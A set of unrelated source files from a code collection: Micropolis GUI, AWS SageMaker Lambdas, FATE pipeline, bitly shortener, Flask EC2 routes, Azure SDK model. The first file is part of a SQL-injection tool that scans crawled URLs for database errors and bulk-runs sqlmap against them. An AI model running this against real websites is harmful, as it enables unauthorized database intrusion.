                    checkverMS2 = soup.find(text=re.compile('An unhandled exception occurred during the execution'))
checkverMS3 = soup.find(text=re.compile('Please review the stack trace for more information'))
print(" [V] Check5 MS SQL found: " + str(checkverMS1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check6 MS SQL found: " + str(checkverMS2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check7 MS SQL found: " + str(checkverMS3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverOR1 = soup.find(text=re.compile('java.sql.SQLException: ORA-00933'))
checkverOR2 = soup.find(text=re.compile('SQLExceptionjava.sql.SQLException'))
checkverOR3 = soup.find(text=re.compile('quoted string not properly terminated'))
print(" [V] Check8 Oracle found: " + str(checkverOR1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check9 Oracle found: " + str(checkverOR2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check10 Oracle found: " + str(checkverOR3).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
checkverPO1 = soup.find(text=re.compile('Query failed:'))
checkverPO2 = soup.find(text=re.compile('unterminated quoted string at or near'))
print(" [V] Check11 Postgre found: " + str(checkverPO1).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
print(" [V] Check12 Postgre found: " + str(checkverPO2).replace('\n', ' ').replace('\r', '').replace('\t', '').replace(' ', ''))
# If X is vuln
if (checkMY1 > 0 or checkMY2 > 0 or checkMY3 > 0 or checkMY4 > 0 or checkMS1 > 0 or checkMS2 > 0 or checkMS3 > 0 or checkOR1 > 0 or checkOR2 > 0 or checkOR3 > 0 or checkPO1 > 0 or checkPO2):
print(
bcolors.OKGREEN
+ "\n"
+ " Possible vuln url!"
+ "\n"
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [+] "
+ line + bcolors.ENDC
+ "\n"
)
if savesearch == "y":
with open(filename, 'a') as file:
file.write(line)
else:
print(
bcolors.WARNING
+ " ["
+ time.strftime("%H:%M:%S")
+ "] [-] " + line + bcolors.ENDC
)
# Skip X or/and exit
except KeyboardInterrupt:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
quitnow = input(bcolors.ENDC + bcolors.BOLD + " Exit program (y/N): " + bcolors.OKBLUE)
if quitnow == "y":
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
else:
print(bcolors.ENDC + " // Continuing\n\n")
# Bad X
except:
print(bcolors.FAIL + " [X] " + line + bcolors.ENDC)
# =================================
# Done - sum it up
# =================================
print("\n Done scanning urls")
if savesearch == "y":
with open(filename) as f:
resultsnumber = sum(1 for _ in f)
print(" Scraping saved in file: " + filename)
print(" Total saved urls: " + str(resultsnumber))
if resultsnumber == 0:
print(" No vuln urls, exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
checkurls = input(bcolors.ENDC + "\n Would you like to run the urls through sqlmap (y/N): " + bcolors.OKBLUE)
if checkurls == "y":
try:
os.remove("tmpurllist")
except OSError:
pass
scanUrlsSQLmap(filename)
else:
print(bcolors.ENDC + " // Exiting\n\n")
try:
os.remove("tmpurllist")
except OSError:
pass
sys.exit()
def scanUrlsSQLmap(filenameVulnUrl):
print("\n\n\n" + bcolors.HEADER)
print(" #===============================#")
print(" # #")
print(" # Scan urls with #")
print(" # SQLmap #")
print(" # #")
print(" #===============================#")
print("\n" + bcolors.ENDC)
# =================================
# Check if sqlmap installed, file, etc.
# =================================
if shutil.which('sqlmap') is None:
print(" SQLmap is not installed on system - can't go on.")
print(" Install sqlmap and run command below (sudo pacman -S sqlmap, sudo apt-get install sqlmap, etc.)")
print(" \nCommand:")
print(" sqlmap -m \"" + filenameVulnUrl + "\n")
else:
if filenameVulnUrl == "0":
print(" No filename in memory, please specify.")
# @type urlfile: str
# @param urlfile: File with the raw urls to check.
filenameVulnUrl = input(bcolors.ENDC + " Filename with urls: " + bcolors.OKBLUE)
if not os.path.isfile(filenameVulnUrl):
print(bcolors.FAIL + " Specified file does not exist.")
print(bcolors.FAIL + " Exiting")
sys.exit()
print(bcolors.ENDC + " SQLmap will be started with arguments dbs, batch, random-agent, 4xthreads.")
fileDestination = (os.getcwd() + "/" + filenameVulnUrl)
command = ('sqlmap -m ' + fileDestination + " --dbs --batch --random-agent --threads 4")
print("Command to execute: " + command)
input(bcolors.ENDC + " Press enter to continue\n")
print(bcolors.ENDC + " Starting SQLmap - follow onscreen instructions")
print(bcolors.BOLD + " Press Ctrl + c to exit\n\n\n")
# RUN SQLMAP !!
os.system(command)
# Not implemented - specify saving destination
# @type savingplace: str
# @param savingplace: Who should perform the search.
# savingplace = input(bcolors.ENDC + " Specify folder where results will be placed: " + bcolors.OKBLUE)
# if savingplace not in ('b', 'g'):
# print(bcolors.WARNING + " - Wrong input - only 'b' and 'g' allowed. Using 'b'")
# savingplace = 'b'
def helpme():
print("\n\n" + bcolors.HEADER)
print(" .---. .---. .-''-. .---. .-------. ,---. ,---. .-''-. ")
print(" | | |_ _| .'_ _ \ | ,_| \ _(`)_ \ | \ / | .'_ _ \ ")
print(" | | ( ' ) / ( ` ) ',-./ ) | (_ o._)| | , \/ , | / ( ` ) ' ")
print(" | '-(_{;}_). (_ o _) |\ '_ '`) | (_,_) / | |\_ /| |. (_ o _) | ")
print(" | (_,_) | (_,_)___| > (_) ) | '-.-' | _( )_/ | || (_,_)___| ")
print(" | _ _--. | ' \ .---.( . .-' | | | (_ o _) | |' \ .---. ")
print(" |( ' ) | | \ `-' / `-'`-'|___ | | | (_,_) | | \ `-' / ")
print(" (_{;}_)| | \ / | \/ ) | | | | \ / ")
print(" '(_,_) '---' `'-..-' `--------``---' '--' '--' `'-..-' ")
print("\n\n" + bcolors.ENDC)
print(" This python script is developed to show, how many vulnerables websites,")
print(" which are laying around on the web. The main focus of the script is to")
print(" generate a list of vuln urls. Please use the script with causing and")
print(" alert the webadmins of vulnerable pages. The SQLmap implementation is")
print(" just for showcasing.")
print("")
print(" The script is divided into 3 main sections.\n")
print(bcolors.BOLD + " # Section 1" + bcolors.ENDC)
print(" In this section you have to provide a search string, which 'connects' to")
print(" the websites database, e.g. 'php?id='. The script then crawls")
print(" Bing or Google for urls containing it. All of the urls can then be saved")
print(" into a file. (Please be aware that you might get banned for crawling to")
print(" fast, remember an appropriate break/sleep between request).")
print(bcolors.ITALIC + " Example of searchs: php?bookid=, php?idproduct=, php?bookid=, php?catid=,")
print(" php?action=, php?cart_id=, php?title=, php?itemid=" + bcolors.ENDC)
print("")
print(bcolors.BOLD + " # Section 2" + bcolors.ENDC)
print(" This section adds a qoute ' to the websites url. If the website is")
print(" prone to SQL injection, we'll catch this with some predefined error")
print(" messages. The script will not add websites for blind SQL injections,")
print(" due to the predefined error messages.")
print("")
print(bcolors.BOLD + " # Section 3" + bcolors.ENDC)
print(" This is just an activation of sqlmap with the bulk argument and no")
print(" user interaction for validation of SQL injection.")
print("")
print("\n")
print(bcolors.BOLD + " Stay safe and help the vulnerables" + bcolors.ENDC)
print("\n")
sys.exit()
def checkConnection():
# Header request for net connectivity
print(bcolors.ENDC + "\n [*] Checking network connection" + bcolors.ENDC)
conn = http.client.HTTPConnection("www.microsoft.com", 80)
try:
conn.request("HEAD", "/")
print(bcolors.OKGREEN + " [+] Network connection seems OK" + bcolors.ENDC)
    except Exception:
print(bcolors.FAIL + " [-] Network connection seems down" + bcolors.ENDC)
# Checking for tun0 or ppp
print(bcolors.ENDC + " [*] Checking VPN connection" + bcolors.ENDC)
    if not any(iface.startswith(('tun', 'ppp')) for iface in psutil.net_if_addrs()):
print(bcolors.WARNING + " [-] No indication of a VPN connection on tun or ppp found.")
choice = input(bcolors.ENDC + " Continue (y/N): " + bcolors.OKBLUE)
if choice.lower() == "y":
print(bcolors.ENDC + " ")
else:
sys.exit()
else:
print(bcolors.OKGREEN + " [+] Indications of a VPN. Good. Will continue." + bcolors.ENDC)
startpage()
def startpage():
print("\n")
print(bcolors.BOLD + " Please choose your weapon of mass destruction:")
print(bcolors.BOLD + " 1" + bcolors.ENDC + " - Scrape the web for possible vuln urls")
print(bcolors.BOLD + " 2" + bcolors.ENDC + " - Check the urls for vulnerabilities")
print(bcolors.BOLD + " 3" + bcolors.ENDC + " - Bulk exploit urls with sqlmap")
print(bcolors.BOLD + " 4" + bcolors.ENDC + " - Help me")
print("\n")
# @type choice: str
# @param choice: Weapon of massdestruction
choice = input(bcolors.ENDC + " Enter choice numer (1, 2, 3, 4): " + bcolors.OKBLUE)
if not choice.isdigit():
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice not in ('1', '2', '3', '4'):
print(bcolors.WARNING + " - Wrong input - only 1, 2, 3 and 4 allowed")
print(" - Exiting\n")
sys.exit()
if choice == "1":
inputSearchUrls()
elif choice == "2":
checkUrlsForVuln(filenameRawUrl)
elif choice == "3":
scanUrlsSQLmap(filenameVulnUrl)
elif choice == "4":
helpme()
def main():
os.system('clear')
print("\n\n")
print(" _____ __ _____ ____ __ _ _ __ _ ")
print(" / __(_)___ ____/ / / ___// __ \ / / (_)___ (_)__ _____/ /_(_)___ ____ ")
print(" / /_/ / __ \/ __ / \__ \/ / / / / / / / __ \ / / _ \/ ___/ __/ / __ \/ __ |")
print(" / __/ / / / / /_/ / ___/ / /_/ / / /___ / / / / / / / __/ /__/ /_/ / /_/ / / / /")
print(" /_/ /_/_/ /_/\__,_/ /____/\___\_\/_____/ /_/_/ /_/_/ /\___/\___/\__/_/\____/_/ /_/ ")
print(" /___/ ")
print("\n\n")
checkConnection()
# GO GO GO
main()
| 46.040419 | 206 | 0.497773 | [
"MIT"
] | ThomasTJdev/python_gdork_sqli | findsqlinj.py | 30,755 | Python |
# micropolisnoticepanel.py
#
# Micropolis, Unix Version. This game was released for the Unix platform
# in or about 1990 and has been modified for inclusion in the One Laptop
# Per Child program. Copyright (C) 1989 - 2007 Electronic Arts Inc. If
# you need assistance with this program, you may contact:
# http://wiki.laptop.org/go/Micropolis or email [email protected].
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details. You should have received a
# copy of the GNU General Public License along with this program. If
# not, see <http://www.gnu.org/licenses/>.
#
# ADDITIONAL TERMS per GNU GPL Section 7
#
# No trademark or publicity rights are granted. This license does NOT
# give you any right, title or interest in the trademark SimCity or any
# other Electronic Arts trademark. You may not distribute any
# modification of this program using the trademark SimCity or claim any
# affliation or association with Electronic Arts Inc. or its employees.
#
# Any propagation or conveyance of this program must include this
# copyright notice and these terms.
#
# If you convey this program (or any modifications of it) and assume
# contractual liability for the program to recipients of it, you agree
# to indemnify Electronic Arts for any liability that those contractual
# assumptions impose on Electronic Arts.
#
# You may not misrepresent the origins of this program; modified
# versions of the program must be marked as such and not identified as
# the original program.
#
# This disclaimer supplements the one included in the General Public
# License. TO THE FULLEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW, THIS
# PROGRAM IS PROVIDED TO YOU "AS IS," WITH ALL FAULTS, WITHOUT WARRANTY
# OF ANY KIND, AND YOUR USE IS AT YOUR SOLE RISK. THE ENTIRE RISK OF
# SATISFACTORY QUALITY AND PERFORMANCE RESIDES WITH YOU. ELECTRONIC ARTS
# DISCLAIMS ANY AND ALL EXPRESS, IMPLIED OR STATUTORY WARRANTIES,
# INCLUDING IMPLIED WARRANTIES OF MERCHANTABILITY, SATISFACTORY QUALITY,
# FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT OF THIRD PARTY
# RIGHTS, AND WARRANTIES (IF ANY) ARISING FROM A COURSE OF DEALING,
# USAGE, OR TRADE PRACTICE. ELECTRONIC ARTS DOES NOT WARRANT AGAINST
# INTERFERENCE WITH YOUR ENJOYMENT OF THE PROGRAM; THAT THE PROGRAM WILL
# MEET YOUR REQUIREMENTS; THAT OPERATION OF THE PROGRAM WILL BE
# UNINTERRUPTED OR ERROR-FREE, OR THAT THE PROGRAM WILL BE COMPATIBLE
# WITH THIRD PARTY SOFTWARE OR THAT ANY ERRORS IN THE PROGRAM WILL BE
# CORRECTED. NO ORAL OR WRITTEN ADVICE PROVIDED BY ELECTRONIC ARTS OR
# ANY AUTHORIZED REPRESENTATIVE SHALL CREATE A WARRANTY. SOME
# JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF OR LIMITATIONS ON IMPLIED
# WARRANTIES OR THE LIMITATIONS ON THE APPLICABLE STATUTORY RIGHTS OF A
# CONSUMER, SO SOME OR ALL OF THE ABOVE EXCLUSIONS AND LIMITATIONS MAY
# NOT APPLY TO YOU.
########################################################################
# Micropolis Status View
# Don Hopkins
########################################################################
# Import stuff
from gi.repository import Gtk as gtk
import cairo
from gi.repository import Pango as pango
from . import micropolisengine
from . import micropolisview
from . import micropolisnoticeview
from . import micropolisdrawingarea
########################################################################
# MicropolisNoticePanel
class MicropolisNoticePanel(gtk.Frame):
def __init__(
self,
engine=None,
centerOnTileHandler=None,
**args):
gtk.Frame.__init__(
self,
**args)
self.engine = engine
self.mapViewVisible = False
engine.expressInterest(
self,
('gameMode',))
# Views
hpaned1 = gtk.HPaned()
self.hpaned1 = hpaned1
self.add(hpaned1)
self.noticeView = micropolisnoticeview.MicropolisNoticeView(
engine=engine,
setMapViewVisible=self.setMapViewVisible)
hpaned1.pack1(self.noticeView, resize=False, shrink=False)
mapView = micropolisdrawingarea.NoticeMicropolisDrawingArea(
engine=engine,
centerOnTileHandler=centerOnTileHandler)
self.mapView = mapView
mapView.set_size_request(150, -1)
mapView.visible = False
hpaned1.pack2(mapView, resize=False, shrink=False)
hpaned1.set_position(1000)
def update(self, name, *args):
engine = self.engine
if name == 'gameMode':
self.updateMapViewAdded()
def updateMapViewAdded(self):
engine = self.engine
mapView = self.mapView
if ((engine.gameMode == 'play') and
self.mapViewVisible):
mapView.set_property("visible", True)
mapView.engage()
else:
mapView.set_property("visible", False)
mapView.disengage()
def setMapViewVisible(self, visible, tileX=-1, tileY=-1, sprite=micropolisengine.SPRITE_NOTUSED):
#print "setMapViewVisible", visible, tileX, tileY, self.mapViewVisible
engine = self.engine
mapView = self.mapView
if visible and (tileX >= 0) and (tileY >= 0):
mapView.centerOnTile(tileX, tileY)
mapView.sprite = sprite
self.mapViewVisible = visible
self.updateMapViewAdded()
########################################################################
| 36.110429 | 101 | 0.678899 | [
"MIT"
] | cmoimoro/gym-micropolis-ga | micropolis/MicropolisCore/src/pyMicropolis/micropolisEngine/micropolisnoticepanel.py | 5,886 | Python |
import json
import datetime
import time
import boto3
import os
def train_and_generate_recommendations(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
for row in rows:
# Read the input row number (the output row number will be the same).
row_number = row[0]
# Read the first input parameter's value. For example, this can be a
# numeric value or a string, or it can be a compound value such as
# a JSON structure.
_input_table_name = row[1]
_output_table_name = row[2]
# start the SageMaker training job
client = boto3.client('sagemaker')
bucket = os.environ['s3_bucket']
prefix = "training-job-" + time.strftime("%Y%m%d%H%M%S")
s3_output_location = 's3://{}/'.format(bucket)
print(s3_output_location)
training_job_name = prefix
TRAINING_IMAGE_ECR_PATH = os.environ['training_image_ecr_path']
SAGEMAKER_ROLE_ARN = os.environ['sagemaker_role_arn']
response = client.create_training_job(
TrainingJobName=training_job_name,
HyperParameters=dict(input_table_name=_input_table_name, output_table_name=_output_table_name, region=os.environ['region']),
AlgorithmSpecification={
'TrainingImage': TRAINING_IMAGE_ECR_PATH,
'TrainingInputMode': 'File'
},
RoleArn=SAGEMAKER_ROLE_ARN,
OutputDataConfig={
'S3OutputPath': s3_output_location
},
ResourceConfig={
'InstanceType': 'ml.m5.xlarge',
'InstanceCount': 1,
'VolumeSizeInGB': 10
},
StoppingCondition={
'MaxRuntimeInSeconds': 10000
}
)
training_job_arn = response['TrainingJobArn']
print(training_job_arn)
array_of_rows_to_return = []
# Put the returned row number and the returned value into an array.
row_to_return = [0, training_job_arn]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
}
def deploy_model(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
for row in rows:
# Read the input row number (the output row number will be the same).
row_number = row[0]
# Read the first input parameter's value.
model_name = row[1]
model_data_url = row[2]
# start the SageMaker training job
client = boto3.client('sagemaker')
ECR_PATH = os.environ['training_image_ecr_path']
SAGEMAKER_ROLE_ARN = os.environ['sagemaker_role_arn']
response = client.create_model(
ModelName=model_name,
PrimaryContainer={
'Image': ECR_PATH,
'ModelDataUrl': model_data_url
},
ExecutionRoleArn=SAGEMAKER_ROLE_ARN
)
print(response)
print("now trying to create endpoint config...")
response = client.create_endpoint_config(
EndpointConfigName=model_name,
ProductionVariants=[
{
'VariantName': 'variant-1',
'ModelName': model_name,
'InitialInstanceCount': 1,
'InstanceType': 'ml.t2.medium'
}
]
)
print(response)
print("now trying to create the endpoint...")
response = client.create_endpoint(
EndpointName=model_name,
EndpointConfigName=model_name
)
endpoint_arn = response['EndpointArn']
print(endpoint_arn)
array_of_rows_to_return = []
# Put the returned row number and the returned value into an array.
row_to_return = [0, endpoint_arn]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
}
# function that performs real-time prediction
def invoke_model(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
body = ""
for row in rows:
model_name = row[1]
# extract and transform the user_ids and item_ids posted to csv
body = body + row[2] + "," + row[3] + "\n"
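        # The accumulated body is plain CSV, one "user_id,item_id" pair per
        # line - e.g. (illustrative values) "123,456\n789,1011\n".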
# invoke the SageMaker endpoint
client = boto3.client('sagemaker-runtime')
response = client.invoke_endpoint(
EndpointName=model_name,
Body=body.encode('utf-8'),
ContentType='text/csv'
)
predictions = response["Body"].read().decode('utf-8')
i = 0
array_of_rows_to_return = []
for prediction in iter(predictions.splitlines()):
# Put the returned row number and the returned value into an array.
row_to_return = [i, prediction]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
i = i + 1
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
} | 32.938525 | 136 | 0.603957 | [
"Apache-2.0"
] | Snowflake-Labs/sfguide-recommender-pipeline | sls/handler.py | 8,037 | Python |
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import json
from pipeline.backend.pipeline import PipeLine
from pipeline.component.dataio import DataIO
from pipeline.component.homo_lr import HomoLR
from pipeline.component.reader import Reader
from pipeline.component.scale import FeatureScale
from pipeline.interface.data import Data
from pipeline.utils.tools import load_job_config
from pipeline.runtime.entity import JobParameters
def main(config="../../config.yaml", namespace=""):
# obtain config
if isinstance(config, str):
config = load_job_config(config)
parties = config.parties
guest = parties.guest[0]
host = parties.host[0]
arbiter = parties.arbiter[0]
backend = config.backend
work_mode = config.work_mode
guest_train_data = {"name": "breast_homo_guest", "namespace": f"experiment{namespace}"}
host_train_data = {"name": "breast_homo_host", "namespace": f"experiment{namespace}"}
# initialize pipeline
pipeline = PipeLine()
# set job initiator
pipeline.set_initiator(role='guest', party_id=guest)
# set participants information
pipeline.set_roles(guest=guest, host=host, arbiter=arbiter)
# define Reader components to read in data
reader_0 = Reader(name="reader_0")
# configure Reader for guest
reader_0.get_party_instance(role='guest', party_id=guest).component_param(table=guest_train_data)
# configure Reader for host
reader_0.get_party_instance(role='host', party_id=host).component_param(table=host_train_data)
# define DataIO components
dataio_0 = DataIO(name="dataio_0", with_label=True, output_format="dense") # start component numbering at 0
scale_0 = FeatureScale(name='scale_0')
param = {
"penalty": "L2",
"optimizer": "sgd",
"tol": 1e-05,
"alpha": 0.01,
"max_iter": 3,
"early_stop": "diff",
"batch_size": 320,
"learning_rate": 0.15,
"decay": 1.0,
"decay_sqrt": True,
"init_param": {
"init_method": "zeros"
},
"encrypt_param": {
"method": None
},
"cv_param": {
"n_splits": 5,
"shuffle": True,
"random_seed": 33,
"need_cv": True
}
}
homo_lr_0 = HomoLR(name='homo_lr_0', **param)
# add components to pipeline, in order of task execution
pipeline.add_component(reader_0)
pipeline.add_component(dataio_0, data=Data(data=reader_0.output.data))
    # set data input sources of the scaler and trainer components
pipeline.add_component(scale_0, data=Data(data=dataio_0.output.data))
pipeline.add_component(homo_lr_0, data=Data(train_data=scale_0.output.data))
# compile pipeline once finished adding modules, this step will form conf and dsl files for running job
pipeline.compile()
# fit model
job_parameters = JobParameters(backend=backend, work_mode=work_mode)
pipeline.fit(job_parameters)
# query component summary
print(json.dumps(pipeline.get_component("homo_lr_0").get_summary(), indent=4, ensure_ascii=False))
if __name__ == "__main__":
parser = argparse.ArgumentParser("PIPELINE DEMO")
parser.add_argument("-config", type=str,
help="config file")
args = parser.parse_args()
if args.config is not None:
main(args.config)
else:
main()
| 34.565217 | 112 | 0.686289 | [
"Apache-2.0"
] | Alice-6161/FATE | examples/pipeline/homo_logistic_regression/pipeline-homo-lr-cv.py | 3,975 | Python |
from urllib.parse import urlparse
from dotenv import load_dotenv
import requests
import os
import argparse
def shorten_link(token, url):
response = requests.post(
"https://api-ssl.bitly.com/v4/bitlinks",
headers={"Authorization": "Bearer {}".format(token)},
json={"long_url": url})
response.raise_for_status()
return response.json()["link"]
def count_clicks(token, link):
response = requests.get(
"https://api-ssl.bitly.com/v4/bitlinks/{0}{1}/clicks/summary"
.format(link.netloc, link.path),
headers={"Authorization": "Bearer {}".format(token)})
response.raise_for_status()
return response.json()["total_clicks"]
def is_bitlink(token, link):
response = requests.get(
"https://api-ssl.bitly.com/v4/bitlinks/{0}{1}"
.format(link.netloc, link.path),
headers={"Authorization": "Bearer {}".format(token)})
return response.ok
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Программа для сокращения ссылок или "
"подсчёта количества переходов для bitlink")
parser.add_argument("url", help="Введите URL или bitlink")
args = parser.parse_args()
link = args.url
parsed_bitlink = urlparse(link)
load_dotenv()
token = os.environ["BITLY_TOKEN"]
try:
        if is_bitlink(token, parsed_bitlink):
            clicks_count = count_clicks(token, parsed_bitlink)
            print("Number of clicks on your link: ", clicks_count)
        else:
            bitlink = shorten_link(token, link)
            print("Shortened link: ", bitlink)
    except requests.exceptions.HTTPError:
        print("You entered an invalid link")
| 31.462963 | 73 | 0.646851 | [
"MIT"
] | v-sht/url-shortener | main.py | 1,844 | Python |
from flask import (
Blueprint,
render_template,
g,
Response,
request,
redirect,
url_for,
abort,
)
from flask.helpers import flash
from flask_login import login_required
from saws.blueprints.utils.utils_ec2 import (
get_ec2_info,
get_key_pairs,
download_key_pair,
launch_instance,
stop_instance,
terminate_instance,
describe_instace,
create_tags,
EC2Instance,
)
from saws.blueprints.utils.utils_lambda import get_lambda_info
from saws.forms import CreateInstanceForm
bp = Blueprint('compute', __name__, url_prefix='/compute')
EC2_STATE_MAP = {
'pending': 'secondary',
'running': 'success',
'shutting-down': 'warning',
'terminated': 'danger',
'stopping': 'warning',
'stopped': 'dark'
}
@bp.route('/ec2', methods=['GET'])
@login_required
def ec2():
instances = get_ec2_info(g.user.account)
return render_template('compute/ec2.html', ins=instances, state_map=EC2_STATE_MAP)
@bp.route('/ec2/<id>', methods=['GET'])
@login_required
def instance(id):
instance = describe_instace(g.user.account, id)
if not instance:
abort(404, 'instance not found')
instance_object = EC2Instance(instance)
return render_template('compute/ec2_instance.html', i=instance_object, state_map=EC2_STATE_MAP)
@bp.route('/ec2/<id>/name', methods=['POST'])
@login_required
def instance_name(id):
name = request.form.get('instance_name')
tags = [{'Key': 'Name', 'Value': name}]
create_tags(g.user.account, id, tags)
flash(f'Name changed to {name}', 'success')
return redirect(url_for('compute.instance', id=id))
@bp.route('/ec2/create', methods=['GET', 'POST'])
@login_required
def instance_create():
instance_form = CreateInstanceForm(request.form)
print(request.method)
if request.method == 'POST':
if instance_form.validate():
os = request.form.get('os')
size = request.form.get('size')
key_name = request.form.get('key_pair')
port_22 = request.form.get('port_22')
port_80 = request.form.get('port_80')
print(f'Launching {os} {size} with {port_22} {port_80}')
props = {
'key_name':key_name,
}
# TODO: create sg
launch_instance(g.user.account, props)
flash('Launching instance', 'success')
return redirect(url_for('compute.ec2'))
keys = get_key_pairs(g.user.account)
return render_template('compute/ec2_create.html', keys=keys, form=instance_form)
@bp.route('/ec2/stop/<instance>', methods=['GET'])
@login_required
def instance_stop(instance):
if not instance:
abort(400)
stop_instance(g.user.account, instance)
flash(f'Stopping instance {instance}', 'success')
return redirect(url_for('compute.ec2'))
@bp.route('/ec2/terminate/<instance>', methods=['GET'])
@login_required
def instance_terminate(instance):
if not instance:
abort(400)
terminate_instance(g.user.account, instance)
flash(f'Terminating instance {instance}', 'success')
return redirect(url_for('compute.ec2'))
@bp.route('/ec2/keypair', methods=['GET'])
@login_required
def keypair():
keys = get_key_pairs(g.user.account)
return render_template('compute/ec2_keypair.html', keys=keys)
@bp.route('/ec2/keypair/download/<name>', methods=['GET'])
@login_required
def download_keypair(name):
kp = download_key_pair(g.user.account, name)
return Response(kp['KeyMaterial'], mimetype='application/x-binary')
@bp.route('/functions', methods=['GET'])
@login_required
def functions():
lambdas = get_lambda_info(g.user.account)
return render_template('compute/lambda.html', lambdas=lambdas)
@bp.route('/functions/<id>', methods=['GET'])
@login_required
def single_function(id):
return render_template('compute/lambda.html') | 26.958333 | 99 | 0.674137 | [
"BSD-2-Clause"
] | vlttnv/saws | saws/blueprints/compute.py | 3,882 | Python |
# AutoTransform
# Large scale, component based code modification library
#
# Licensed under the MIT License <http://opensource.org/licenses/MIT>
# SPDX-License-Identifier: MIT
# Copyright (c) 2022-present Nathan Rockenbach <http://github.com/nathro>
# @black_format
"""A change represents a submission from a run of AutoTransform on a particular Batch. They
are used for managing submissions to code review/source control systems. A pull request is
an example of a potential change."""
| 37.538462 | 91 | 0.780738 | [
"MIT"
] | nathro/AutoTransform | src/python/autotransform/change/__init__.py | 488 | Python |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .linked_service_py3 import LinkedService
class AmazonRedshiftLinkedService(LinkedService):
"""Linked service for Amazon Redshift.
All required parameters must be populated in order to send to Azure.
    :param additional_properties: Unmatched properties from the message are
     deserialized to this collection
:type additional_properties: dict[str, object]
:param connect_via: The integration runtime reference.
:type connect_via:
~azure.mgmt.datafactory.models.IntegrationRuntimeReference
:param description: Linked service description.
:type description: str
:param parameters: Parameters for linked service.
:type parameters: dict[str,
~azure.mgmt.datafactory.models.ParameterSpecification]
    :param annotations: List of tags that can be used for describing the
     linked service.
:type annotations: list[object]
:param type: Required. Constant filled by server.
:type type: str
:param server: Required. The name of the Amazon Redshift server. Type:
string (or Expression with resultType string).
:type server: object
:param username: The username of the Amazon Redshift source. Type: string
(or Expression with resultType string).
:type username: object
:param password: The password of the Amazon Redshift source.
:type password: ~azure.mgmt.datafactory.models.SecretBase
:param database: Required. The database name of the Amazon Redshift
source. Type: string (or Expression with resultType string).
:type database: object
:param port: The TCP port number that the Amazon Redshift server uses to
listen for client connections. The default value is 5439. Type: integer
(or Expression with resultType integer).
:type port: object
:param encrypted_credential: The encrypted credential used for
authentication. Credentials are encrypted using the integration runtime
credential manager. Type: string (or Expression with resultType string).
:type encrypted_credential: object
"""
_validation = {
'type': {'required': True},
'server': {'required': True},
'database': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
